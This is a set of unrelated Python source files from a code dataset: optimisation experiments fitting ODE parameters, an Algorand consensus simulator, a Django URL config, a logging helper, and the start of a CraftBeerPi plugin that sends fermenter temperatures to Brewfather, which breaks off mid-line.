Estimating the three models and its parameters on full data, see convergence behavior and performance\n\n# np.random.seed(seedy)\n# for eval in ['RMSE','MAE']: # Loop over both evaluation methods\n# start1 = time.time()\n# HC05, HC10, HC125, HC15, HC_start1, HC_start2 = [], [], [], [], [], []\n# HC05_conv, HC10_conv, HC125_conv, HC15_conv, HC_start1_conv, HC_start2_conv = np.repeat(0, n_iter), np.repeat(0, n_iter),\\\n# np.repeat(0, n_iter), np.repeat(0, n_iter),\\\n# np.repeat(0, n_iter), np.repeat(0, n_iter)\n# SA01, SA025, SA05, SA10, SA40, SA100 = [], [], [], [], [], []\n# SA01_conv, SA025_conv, SA05_conv, SA10_conv, SA40_conv, SA100_conv = np.repeat(0, n_iter), np.repeat(0,n_iter), \\\n# np.repeat(0, n_iter), np.repeat(0,n_iter), \\\n# np.repeat(0, n_iter), np.repeat(0,n_iter)\n# SA_exp, SA_lin, SA_init10, SA_init01 = [], [], [], []\n# SA_exp_conv, SA_lin_conv, SA_init10_conv, SA_init01_conv = np.repeat(0, n_iter), np.repeat(0,n_iter),np.repeat(0, n_iter), np.repeat(0,n_iter)\n# for i in range(reps):\n# print('REPLICATION {}'.format(i))\n# #1. Stepsize experiments Hill climber\n# RMSE, params, RMSE_list = hillclimber(ODE_error, data, t,n_iter=n_iter,stepsize=0.5)\n# HC05.append(RMSE)\n# HC05_conv = [x + y for x, y in zip(HC05_conv, np.array(RMSE_list)/reps)]\n# if i == 0: params_HC05 = params\n# elif RMSE < HC05[i-1]: params_HC05 = params\n# print('HC .5 DONE')\n# print('Run {} with {} took {} seconds'.format(i,eval,time.time()-start1))\n#\n# RMSE, params, RMSE_list = hillclimber(ODE_error, data, t, n_iter=n_iter, stepsize=1)\n# HC10.append(RMSE)\n# HC10_conv = [x + y for x, y in zip(HC10_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_HC10 = params\n# elif RMSE < HC10[i - 1]: params_HC10 = params\n# print('HC 1 DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# RMSE, params, RMSE_list = hillclimber(ODE_error, data, t,n_iter=n_iter,stepsize=1.25)\n# HC125.append(RMSE)\n# HC125_conv = [x + y for x, y in zip(HC125_conv, np.array(RMSE_list)/reps)]\n# if i == 0: params_HC125 = params\n# elif RMSE < HC125[i-1]: params_HC125 = params\n# print('HC 1.25 DONE')\n# print('Run {} with {} took {} seconds'.format(i,eval,time.time()-start1))\n#\n# RMSE, params, RMSE_list = hillclimber(ODE_error, data, t,n_iter=n_iter,stepsize=1.5)\n# HC15.append(RMSE)\n# HC15_conv = [x + y for x, y in zip(HC15_conv, np.array(RMSE_list)/reps)]\n# if i == 0: params_HC15 = params\n# elif RMSE < HC15[i-1]: params_HC15 = params\n# print('HC 1.5 DONE')\n# print('Run {} with {} took {} seconds'.format(i,eval,time.time()-start1))\n#\n# #2. Starting value experiments HC\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t,n_iter=n_iter,params0=(1,1,1,1))\n# HC_start1.append(RMSE)\n# HC_start1_conv = [x + y for x, y in zip(HC_start1_conv, np.array(RMSE_list)/reps)]\n# if i == 0: params_HC_start1 = params\n# elif RMSE < HC_start1[i-1]: params_HC_start1 = params\n# print('HC 1,1,1,1 DONE')\n# print('Run {} with {} took {} seconds'.format(i,eval,time.time()-start1))\n#\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, params0=(2, 2, 2, 2))\n# HC_start2.append(RMSE)\n# HC_start2_conv = [x + y for x, y in zip(HC_start2_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_HC_start2 = params\n# elif RMSE < HC_start2[i - 1]: params_HC_start2 = params\n# print('HC 2,2,2,2 DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# #3. Stepsize experiments for Simulated Annealing\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter,stepsize=0.1)\n# SA01.append(RMSE)\n# SA01_conv = [x + y for x, y in zip(SA01_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA01 = params\n# elif RMSE < SA01[i - 1]: params_SA01 = params\n# print('SA .1 DONE')\n# print('Run {} with {} took {} seconds'.format(i,eval,time.time()-start1))\n#\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, stepsize=0.25)\n# SA025.append(RMSE)\n# SA025_conv = [x + y for x, y in zip(SA025_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA025 = params\n# elif RMSE < SA025[i - 1]: params_SA025 = params\n# print('SA .25 DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, stepsize=0.5)\n# SA05.append(RMSE)\n# SA05_conv = [x + y for x, y in zip(SA05_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA05 = params\n# elif RMSE < SA05[i - 1]: params_SA05 = params\n# print('SA .5 DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, stepsize=1)\n# SA10.append(RMSE)\n# SA10_conv = [x + y for x, y in zip(SA10_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA10 = params\n# elif RMSE < SA10[i - 1]: params_SA10 = params\n# print('SA 1 DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# # 4. Markov chain experiments with SA\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, n_inner=40)\n# SA40.append(RMSE)\n# SA40_conv = [x + y for x, y in zip(SA40_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA40 = params\n# elif RMSE < SA40[i - 1]: params_SA40 = params\n# print('SA 40 DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, n_inner=100)\n# SA100.append(RMSE)\n# SA100_conv = [x + y for x, y in zip(SA100_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA100 = params\n# elif RMSE < SA100[i - 1]: params_SA100 = params\n# print('SA 100 DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# # 7. Cooling schedule experiments for SA\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter,cooling='linear')\n# SA_lin.append(RMSE)\n# SA_lin_conv = [x + y for x, y in zip(SA_lin_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA_lin = params\n# elif RMSE < SA_lin[i - 1]: params_SA_lin = params\n# print('SA linear DONE')\n# print('Run {} with {} took {} seconds'.format(i,eval,time.time()-start1))\n#\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, cooling='exponential')\n# SA_exp.append(RMSE)\n# SA_exp_conv = [x + y for x, y in zip(SA_exp_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA_exp = params\n# elif RMSE < SA_exp[i - 1]: params_SA_exp = params\n# print('SA exp DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# # 8. Starting temperature experiments for SA\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter,temprange=(10**1,10**-3))\n# SA_init10.append(RMSE)\n# SA_init10_conv = [x + y for x, y in zip(SA_init10_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA_init10 = params\n# elif RMSE < SA_init10[i - 1]: params_SA_init10 = params\n# print('SA init10 DONE')\n# print('Run {} with {} took {} seconds'.format(i,eval,time.time()-start1))\n#\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, temprange=(10 ** -1, 10 ** -3))\n# SA_init01.append(RMSE)\n# SA_init01_conv = [x + y for x, y in zip(SA_init01_conv, np.array(RMSE_list) / reps)]\n# if i == 0:\n# params_SA_init01 = params\n# elif RMSE < SA_init01[i - 1]:\n# params_SA_init01 = params\n# print('SA init01 DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# HC_convs = [HC05_conv, HC10_conv, HC125_conv, HC15_conv, HC_start1_conv, HC_start2_conv]\n# for j in range(len(HC_convs)):\n# if len(HC_convs[j]) < n_iter:\n# HC_convs[j].extend(list(np.zeros(n_iter-len(HC_convs[j]))))\n#\n#\n# SA01_conv = np.array([np.repeat(SA01_conv[i + 1], 50) for i in np.arange(0, len(SA01_conv) - 1)]).reshape(n_iter)\n# SA025_conv = np.array([np.repeat(SA025_conv[i + 1], 50) for i in np.arange(0, len(SA025_conv) - 1)]).reshape(n_iter)\n# SA05_conv = np.array([np.repeat(SA05_conv[i + 1], 50) for i in np.arange(0, len(SA05_conv) - 1)]).reshape(n_iter)\n# SA10_conv = np.array([np.repeat(SA10_conv[i + 1], 50) for i in np.arange(0, len(SA10_conv) - 1)]).reshape(n_iter)\n# SA40_conv = np.array([np.repeat(SA40_conv[i + 1], 40) for i in np.arange(0, len(SA40_conv) - 1)]).reshape(n_iter)\n# SA100_conv = np.array([np.repeat(SA100_conv[i + 1], 100) for i in np.arange(0, len(SA100_conv) - 1)]).reshape(n_iter)\n# SA_lin_conv = np.array([np.repeat(SA_lin_conv[i + 1], 50) for i in np.arange(0, len(SA_lin_conv) - 1)]).reshape(n_iter)\n# SA_exp_conv = np.array([np.repeat(SA_exp_conv[i + 1], 50) for i in np.arange(0, len(SA_exp_conv) - 1)]).reshape(n_iter)\n# SA_init10_conv = np.array([np.repeat(SA_init10_conv[i + 1], 50) for i in np.arange(0, len(SA_init10_conv) - 1)]).reshape(n_iter)\n# SA_init01_conv = np.array([np.repeat(SA_init01_conv[i + 1], 50) for i in np.arange(0, len(SA_init01_conv) - 1)]).reshape(n_iter)\n#\n# #Create dataframes and save\n# error_dict = {'HC05': HC05,'HC10': HC10, 'HC125': HC125,'HC15': HC15,'HC_start1': HC_start1, 'HC_start2': HC_start2,\n# 'SA01': SA01,'SA025': SA025, 'SA05': SA05,'SA10': SA10,'SA40': SA40, 'SA100': SA100,\n# 'SA_exp': SA_exp,'SA_lin': SA_lin, 'SA_init10': SA_init10,'SA_init01':SA_init01}\n# conv_dict = {'HC05': HC05_conv, 'HC10': HC10_conv, 'HC125': HC125_conv, 'HC15': HC15_conv, 'HC_start1': HC_start1_conv,\n# 'HC_start2': HC_start2_conv,'SA01': SA01_conv, 'SA025': SA025_conv, 'SA05': SA05_conv, 'SA10': SA10_conv,\n# 'SA40': SA40_conv, 'SA100': SA100_conv,'SA_exp': SA_exp_conv, 'SA_lin': SA_lin_conv, 'SA_init10': SA_init10_conv,\n# 'SA_init01': SA_init01_conv}\n# param_dict = {'HC05': params_HC05, 'HC10': params_HC10, 'HC125': params_HC125, 'HC15': params_HC15, 'HC_start1': params_HC_start1,\n# 'HC_start2': params_HC_start2,\n# 'SA01': params_SA01, 'SA025': params_SA025, 'SA05': params_SA05, 'SA10': params_SA10, 'SA40': params_SA40, 'SA100': params_SA100,\n# 'SA_exp': params_SA_exp, 'SA_lin': params_SA_lin, 'SA_init10': params_SA_init10, 'SA_init01': params_SA_init01}\n# pd.DataFrame(error_dict).to_csv('Data/{}.csv'.format(eval))\n# pd.DataFrame(conv_dict).to_csv('Data/{}-conv.csv'.format(eval))\n# pd.DataFrame(param_dict).to_csv('Data/{}-params.csv'.format(eval))\n\nprint('Simulations with varying startvalues and cooling took {} seconds'.format(time.time()-start))\n\n#Run optimal settings for HC and SA\nnp.random.seed(seedy)\nn_iter = 500\nreps = 2\nfor eval in ['RMSE','MAE']: # Loop over both evaluation methods\n start1 = time.time()\n HC, SA, HC_conv, SA_conv = [], [], np.zeros(n_iter), np.zeros(n_iter)\n\n for i in range(reps):\n print('REPLICATION {}'.format(i))\n #HC\n RMSE, params, RMSE_list = hillclimber(ODE_error, data, t,n_iter=n_iter,stepsize=1)\n HC.append(RMSE)\n HC_conv = [x + y for x, y in zip(HC_conv, np.array(RMSE_list)/reps)]\n if i == 0: params_HC = params\n elif RMSE < HC[i-1]: params_HC = params\n print('HC DONE')\n print('Run {} with {} took {} seconds'.format(i,eval,time.time()-start1))\n\n #SA\n RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, stepsize=0.25)\n SA.append(RMSE)\n SA_conv = [x + y for x, y in zip(SA_conv, np.array(RMSE_list) / reps)]\n if i == 0: params_SA = params\n elif RMSE < SA[i - 1]: params_SA = params\n print('SA DONE')\n print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n\n if len(HC_conv) < n_iter:\n HC_conv.extend(list(np.zeros(n_iter - len(HC_conv))))\n SA_conv = np.array([np.repeat(SA_conv[i + 1], 50) for i in np.arange(0, len(SA_conv) - 1)]).reshape(n_iter)\n pd.DataFrame({'HC':HC,'SA':SA}).to_csv('optimal-{}.csv'.format(eval))\n pd.DataFrame({'HC':HC_conv,'SA':SA_conv}).to_csv('optimal-{}-conv.csv'.format(eval))\n pd.DataFrame({'HC':params_HC,'SA':params_SA}).to_csv('optimal-params-{}.csv'.format(eval))\n\n# ## Estimating the three models and its parameters on part of data, see convergence behavior and performance\n# np.random.seed(seedy)\n# reps = 5\n#\n# for eval in ['RMSE', 'MAE']:\n# print('Runs with {} as evaluation function'.format(eval))# Loop over both evaluation methods\n# RMSE_HC, RMSE_SA, RMSE_GA = [], [], []\n# RMSE_HC_std, RMSE_SA_std, RMSE_GA_std = [], [], []\n#\n# for s in np.arange(100,20,-10):\n# start2 = time.time()\n# print('SAMPLE SIZE {}'.format(s))\n# df_sample = df.sample(s).sort_values(by='t')\n# t = df_sample.loc[:, 't'].to_numpy()\n# data = np.transpose(np.array([df_sample.loc[:, 'x'].values.tolist(), df_sample.loc[:, 'y'].values.tolist()]))\n#\n# RMSE_HC_sample, RMSE_SA_sample, RMSE_GA_sample = [], [], []\n# #Replicate experiments\n# for i in range(reps):\n# #1. Hill climber\n# print('REP {}'.format(i))\n# RMSE, params, RMSE_list = hillclimber(ODE_error, data, t,n_iter=n_iter)\n# RMSE_HC_sample.append(RMSE)\n#\n# #2. Simulated Annealing\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t,n_iter=n_iter)\n# RMSE_SA_sample.append(RMSE)\n#\n# # #3. Genetic Algorithm\n# # RMSE, params, pop, RMSE_list_best, RMSE_list_avg = gen_al(ODE_error, data, t, n_gen=n_gen)\n# # RMSE_GA_sample.append(RMSE)\n# RMSE_HC.append(np.mean(RMSE_HC_sample))\n# RMSE_SA.append(np.mean(RMSE_SA_sample))\n# # RMSE_GA.append(np.mean(RMSE_GA_sample))\n# RMSE_HC_std.append(np.std(RMSE_HC_sample))\n# RMSE_SA_std.append(np.std(RMSE_SA_sample))\n# # RMSE_GA_std.append(np.std(RMSE_GA_sample))\n# print('Run with {} percent of data took {} seconds'.format(s,time.time()-start2))\n#\n# #Create dataframes and save\n# RMSE_dict = {'HC_mean':RMSE_HC,'HC_std':RMSE_HC_std,'SA_mean':RMSE_SA,'SA_std':RMSE_SA_std}\n# pd.DataFrame(RMSE_dict).to_csv('Data/fracdata-{}.csv'.format(eval))\n\n\nprint('Simulations took {} seconds'.format(time.time()-start))\n\n#3. Genetic Algorithm\n# RMSE, params, pop, RMSE_list_best, RMSE_list_avg = gen_al(ODE_error, data, t, n_gen=n_gen)\n# RMSE_GA.append(RMSE)\n# RMSE_GA_conv = [x + y for x, y in zip(RMSE_GA_conv, np.array(RMSE_list_best) / reps)]\n# RMSE_GA_conv2 = [x + y for x, y in zip(RMSE_GA_conv2, np.array(RMSE_list_avg) / reps)]\n# if i == 0:\n# params_GA = params\n# elif RMSE < RMSE_GA[i - 1]:\n# params_GA = params\n# #Create dataframes and save\n# RMSE_dict = {'HC':RMSE_HC,'SA':RMSE_SA,'GA':RMSE_GA}\n# pd.DataFrame(RMSE_dict).to_csv('Data/{}-overall-{}.csv'.format(name,eval))\n# RMSE_dict = {'HC':RMSE_HC_conv,'SA':RMSE_SA_conv}\n# pd.DataFrame(RMSE_dict).to_csv('Data/{}-avg-conv-{}.csv'.format(name,eval))\n# pd.DataFrame({'GA':RMSE_GA_conv}).to_csv('Data/{}-avg-conv-GA-{}.csv'.format(name,eval))\n# param_dict = {'HC':params_HC,'SA':params_SA,'GA':params_GA}\n# pd.DataFrame(param_dict).to_csv('Data/{}-best-params-{}.csv'.format(name,eval))\n\n\ndef gen_al(function,data,t,evalfunc='RMSE',popsize=50,n_gen=25,\n n_parents=30,p_mutate=0.3):\n \"\"\"Performs simulated annealing to find a solution\"\"\"\n pop = np.random.uniform(0, 2, (popsize,4))\n pop_eval = np.zeros(popsize)\n for p in range(popsize):\n try: pop_eval[p] = function(pop[p], data, t, evalfunc)\n except ValueError: pop_eval[p] = 100\n eval_list1 = [min(pop_eval)]\n eval_list2 = [np.mean(pop_eval)]\n\n epoch = 0\n\n for i in range(n_gen):\n sort_eval = list(np.sort(pop_eval))\n parents = []\n for j in range(n_parents):\n parents.append(np.where(pop_eval == sort_eval[j])[0][0])\n random.shuffle(parents)\n\n for j in range(int(len(parents) / 2)):\n for k in range(np.random.randint(1, 4)):\n alpha = np.random.uniform(0, 1)\n offspring = alpha * pop[parents[j]] + (1 - alpha) * pop[parents[j + int(len(parents) / 2)]]\n if np.random.uniform(0, 1) <= p_mutate:\n offspring += np.random.normal(0, 1, 4)/20\n offspring[offspring < 0] = 0\n pop = np.vstack((pop, offspring))\n pop_eval = np.zeros(pop.shape[0])\n for p in range(pop.shape[0]):\n try: pop_eval[p] = function(pop[p], data, t, evalfunc)\n except ValueError: pop_eval[p] = 100\n sort_eval = list(np.sort(pop_eval))\n index = []\n for j in range(popsize):\n index.append(np.where(pop_eval == sort_eval[j])[0][0])\n pop = pop[index]\n pop_eval = sort_eval[0:popsize]\n best_eval = min(pop_eval)\n best_params = pop[np.where(pop_eval == best_eval)[0][0]]\n eval_list1.append(best_eval)\n eval_list2.append(np.mean(pop_eval))\n epoch += 1\n # print(epoch)\n\n return (best_eval, best_params, pop,eval_list1,eval_list2)\n","sub_path":"Assignment-3/Data/data_cartesius/data_cartesius_14-12/archive/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":22805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"326385940","text":"import random\n\nfrom config import get_config\n\nfrom event_simulator import Event, EventSimulator\nfrom node import Node\nfrom message import Message\nfrom network import Network\n\n\ndef simulation(des, net, config):\n t_proposer = 5\n t_step = 32\n t_final = 32\n _round = 0\n step = 0\n total_j = 0.0\n MAX_STEPS = 10\n s_dash = None\n final_block_count = 0\n calculate_flag = False\n\n ev = des.get_next_event()\n while ev:\n # print(ev)\n node = ev.node\n _type = ev.type\n current_time = ev.timestamp\n if _type == 'PRIORITY_MESSAGE':\n _t = current_time + 33000\n des.add_event(Event(_t, 'CAST_VOTE', node))\n _message = node.create_priority_message(\n node.round, node.step, t_proposer)\n _t = current_time + 3000\n des.add_event(Event(_t, 'CREATE_BLOCK_PROPOSAL', node))\n if _message is not None:\n \n if config.exp2 and calculate_flag != True:\n calculate_flag = False\n _t = current_time + 100\n des.add_event(Event(_t, 'CALCULATE'))\n\n # _t = current_time + 3000\n # des.add_event(Event(_t, 'CREATE_BLOCK_PROPOSAL', node))\n for rcv_node in node.neighbors:\n _t = current_time + node.non_block_msg_delay\n des.add_event(\n Event(_t, 'RECEIVE_PRIORITY_MESSAGE', rcv_node, _message))\n \n if _type == 'CALCULATE':\n net.print_highest_proposer()\n break\n\n elif _type == 'RECEIVE_PRIORITY_MESSAGE':\n _message = node.receive_prio_msg(ev.message)\n if _message is not None:\n for rcv_node in node.neighbors:\n _t = current_time + node.non_block_msg_delay\n des.add_event(\n Event(_t, 'RECEIVE_PRIORITY_MESSAGE', rcv_node, _message))\n\n elif _type == 'CREATE_BLOCK_PROPOSAL':\n des.remove_event('RECEIVE_PRIORITY_MESSAGE', current_time)\n _message = node.propose_block()\n if _message is not None:\n for rcv_node in node.neighbors:\n _t = current_time + node.block_msg_delay\n des.add_event(\n Event(_t, 'RECEIVE_BLOCK_PROPOSAL', rcv_node, _message))\n\n elif _type == 'RECEIVE_BLOCK_PROPOSAL':\n _message = node.receive_block_proposal(ev.message)\n if _message is not None:\n for rcv_node in node.neighbors:\n _t = current_time + node.block_msg_delay\n des.add_event(\n Event(_t, 'RECEIVE_BLOCK_PROPOSAL', rcv_node, _message))\n\n elif _type == 'CAST_VOTE':\n des.remove_event('RECEIVE_BLOCK_PROPOSAL', current_time)\n node.step += 1\n _message = node.committee_vote(node.round, node.step, t_step)\n _t = current_time + 3000\n des.add_event(Event(_t, 'COUNT_VOTES', node))\n if _message is not None:\n for rcv_node in node.neighbors:\n _t = current_time + node.non_block_msg_delay\n des.add_event(\n Event(_t, 'RECEIVE_VOTE_MESSAGE', rcv_node, _message))\n\n elif _type == 'RECEIVE_VOTE_MESSAGE':\n _message = node.receive_vote(ev.message)\n if _message is not None:\n for rcv_node in node.neighbors:\n _t = current_time + node.non_block_msg_delay\n des.add_event(\n Event(_t, 'RECEIVE_VOTE_MESSAGE', rcv_node, _message))\n\n elif _type == 'COUNT_VOTES':\n des.remove_event('RECEIVE_VOTE_MESSAGE', current_time)\n node.r, TIMEOUT = node.count_vote(t_step)\n\n if node.step < 2:\n des.add_event(Event(current_time, 'CAST_VOTE', node))\n else:\n node.block_hash = node.r\n des.add_event(Event(current_time, 'BINARY_BA*', node))\n\n elif _type == 'BINARY_BA*':\n des.add_event(Event(current_time, 'CAST_VOTE_BA*', node))\n\n elif _type == 'CAST_VOTE_BA*':\n _t = current_time + 3000\n if node.s_dash is None:\n node.step += 1\n _message = node.committee_vote(node.round, node.step, t_step)\n des.add_event(Event(_t, 'COUNT_VOTES_BA*', node))\n\n elif node.s_dash > node.step + 3 and node.step == node.s_final:\n node.s_dash = None\n _message = node.committee_vote(\n node.round, node.s_final, t_final)\n node.block_hash = node.r\n _t = current_time + 3000\n des.add_event(Event(_t, 'FINAL_COUNT_VOTES', node))\n else:\n des.add_event(Event(_t, 'BA*_LOOP', node))\n _message = node.committee_vote(node.round, node.s_dash, t_step)\n\n if _message is not None:\n for rcv_node in node.neighbors:\n _t = current_time + node.non_block_msg_delay\n des.add_event(\n Event(_t, 'RECEIVE_VOTE_MESSAGE', rcv_node, _message))\n\n elif _type == 'COUNT_VOTES_BA*':\n node.r, TIMEOUT = node.count_vote(t_step)\n case = (node.step - 3) % 3\n if case == 0:\n des.remove_event('RECEIVE_VOTE_MESSAGE', current_time)\n if node.r != b'Empty' and not TIMEOUT:\n des.add_event(Event(current_time, 'BA*_LOOP', node))\n else:\n if TIMEOUT:\n node.r = node.block_hash\n des.add_event(Event(current_time, 'CAST_VOTE_BA*', node))\n\n if case == 1:\n des.remove_event('RECEIVE_VOTE_MESSAGE', current_time)\n if not TIMEOUT and node.r == b'Empty':\n des.add_event(Event(current_time, 'BA*_LOOP', node))\n else:\n if TIMEOUT:\n node.r = b'Empty'\n des.add_event(Event(current_time, 'CAST_VOTE_BA*', node))\n\n if case == 2:\n if TIMEOUT:\n _t = current_time + 3000\n des.add_event(Event(_t, 'COMMON_COIN', node))\n else:\n des.remove_event('RECEIVE_VOTE_MESSAGE', current_time)\n if node.step + 1 < MAX_STEPS:\n des.add_event(Event(current_time, 'CAST_VOTE_BA*', node))\n\n elif _type == 'COMMON_COIN':\n des.remove_event('RECEIVE_VOTE_MESSAGE', current_time)\n if node.common_coin(node.round, node.step) == 0:\n node.r = node.block_hash\n else:\n node.r = b'Empty'\n des.add_event(Event(current_time, 'CAST_VOTE_BA*', node))\n\n elif _type == 'BA*_LOOP':\n des.remove_event('RECEIVE_VOTE_MESSAGE', current_time)\n if node.s_dash is None:\n node.s_dash = node.step + 1\n else:\n node.s_dash += 1\n\n if node.s_dash <= node.step + 3 or node.step == node.s_final:\n des.add_event(Event(current_time, 'CAST_VOTE_BA*', node))\n else:\n node.block_hash = node.r\n des.add_event(Event(current_time, 'FINAL_COUNT_VOTES', node))\n node.s_dash = None\n\n elif _type == 'FINAL_COUNT_VOTES':\n des.remove_event('RECEIVE_VOTE_MESSAGE', current_time)\n node.r, TIMEOUT = node.count_vote(t_final)\n if node.r == node.block_hash:\n final_block_count += 1\n print(\"Node: {} Final block found\".format(node.id))\n else:\n print(\"Node: {} Tentative block found\".format(node.id))\n \n if final_block_count >= net.num_nodes:\n message = node.proposed_block[0][0].payload\n message = b' || '.join([message.split(b' || ')[0], node.block_hash])\n des.add_event(\n Event(current_time, 'ADD_BLOCK',message=message))\n\n elif _type == 'ADD_BLOCK':\n net.blockchain.add_block(ev.message)\n print(\"Consensus reached on block:\")\n print(ev.message)\n _round += 1\n final_block_count = 0\n if _round >= config.blocks:\n break\n\n for _n in net.node_list:\n _n.reset(_round)\n des.add_event(Event(current_time, 'PRIORITY_MESSAGE', _n))\n\n ev = des.get_next_event()\n \n if config.exp1:\n net.print_stack_sortion_stats()\n \n print(net.blockchain)\n\n\ndef main(config):\n\n net = Network(config.node)\n des = EventSimulator()\n\n # Creating initial events\n # PRIORITY_MESSAGE event\n for node in net.node_list:\n des.add_event(Event(0, 'PRIORITY_MESSAGE', node))\n\n # Main simulation loop\n simulation(des, net, config)\n\n \n\n\nif __name__ == \"__main__\":\n main(get_config())\n # Initialise all nodes and neighbors\n","sub_path":"Algorand/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"585228409","text":"from django.conf.urls import url\nfrom location.views import LocationTemplateView, FloorTemplateView\n\nurlpatterns = [\n url(\n regex=r'^$',\n view=LocationTemplateView.as_view(),\n name='location',\n ),\n url(\n regex=r'^building/(?P\\d{1,10})/floor/(?P\\d{1,10})$',\n view=FloorTemplateView.as_view(),\n name='floor',\n ),\n]\n","sub_path":"location/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"122022130","text":"#encoding:utf-8\n\"\"\"\n系统运行日志类\n\"\"\"\n\nimport os\nimport sys\nimport logging\nfrom logging import handlers\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\nsys.path.append('../')\n\n\nclass Logger(object):\n \"\"\"程序运行日志管理\"\"\"\n # 日志级别关系映射\n level_relations = {\n 'debug': logging.DEBUG,\n 'info': logging.INFO,\n 'warning': logging.WARNING,\n 'error': logging.ERROR,\n 'crit': logging.CRITICAL\n }\n\n file_name = os.path.basename(sys.argv[0])\n file_name = '.'.join(file_name.split('.')[:-1])+'.log' # 默认日志文件名称,为运行文件名称\n\n def __init__(self, filename=file_name, file_path='.', level='info', interval=1, when='D', backup_count = 10,\\\n fmt='%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s', show_terminal=False):\n \"\"\" 初始化日志类\n # 默认日志文件名称为,为程序运行文件名称+.log,否则为指定\n # 默认保持路径为程序当前运行路径\n 默认为显示级别为info,日志生成间隔时间为1,默认单位为天,备份半个月的记录\n show_terminal,是否在终端显示,默认为不显示\n \"\"\"\n filename = os.path.join(file_path, filename)\n self.logger = logging.getLogger(filename)\n format_str = logging.Formatter(fmt) # 设置日志格式\n self.logger.setLevel(self.level_relations.get(level)) # 设置日志级别\n th = handlers.TimedRotatingFileHandler(filename=filename, interval=interval, when=when,\n backupCount=backup_count)\n th.setFormatter(format_str) # 设置文件里写入的格式\n self.logger.addHandler(th)\n if show_terminal:\n sh = logging.StreamHandler() # 往屏幕上输出\n sh.setFormatter(format_str) # 设置屏幕上显示的格式\n self.logger.addHandler(sh) # 把对象加到logger里\n\n\n\nif __name__ == '__main__':\n # log = Logger('all.log',level='debug')\n import time\n log = Logger(show_terminal=True,level='debug')\n domain = \"baidu.com\"\n log.logger.debug('debug%s' % domain)\n log.logger.info('info')\n log.logger.warning('警告')\n log.logger.error('报错')\n log.logger.warning('警告')\n #\n # log.logger.critical('严重')\n # Logger('error.log', level='error').logger.error('error')","sub_path":"respond_server/Logger.py","file_name":"Logger.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"267098181","text":"from modules import cbpi\nimport requests\n\nbf_uri = \"http://log.brewfather.net/stream\"\n\ndef bf_stream_id():\n api_id = cbpi.get_config_parameter(\"brewfather_stream_id\", None)\n if api_id is None:\n try:\n cbpi.add_config_parameter(\"brewfather_stream_id\", \"\", \"text\", \"Brewfather stream API ID\")\n return \"\"\n except:\n cbpi.notify(\"Brewfather Error\", \"Unable to update brewfather_stream_id parameter within database. Try updating CraftBeerPi and reboot.\", type=\"danger\", timeout=None)\n else:\n return api_id\n\n\n@cbpi.backgroundtask(key=\"brewfather_fermtask\", interval=900)\ndef brewfather_background_fermtask(api):\n api_id = bf_stream_id()\n if api_id == \"\":\n cbpi.notify(\"Brewfather Error\", \"Stream ID not set. Update brewfather_stream_id parameter within System > Parameters.\", type=\"danger\", timeout=None)\n return\n\n for i, fermenter in cbpi.cache.get(\"fermenter\").iteritems():\n\n # if fermenter is active, we will log the temperatures\n if fermenter.state is not False:\n try:\n queryString = {\n \"id\": api_id\n }\n \n data = {\n \"name\": fermenter.name,\n \"beer\": fermenter.brewname,\n \"temp\": cbpi.get_sensor_value(fermenter.sensor), \n \"aux_temp\": cbpi.get_sensor_value(fermenter.sensor2), \n \"ext_temp\": cbpi.get_sensor_value(fermenter.sensor3), \n \"temp_unit\": cbpi.get_config_parameter(\"unit\", \"C\")\n }\n\n response = requests.post(bf_uri, 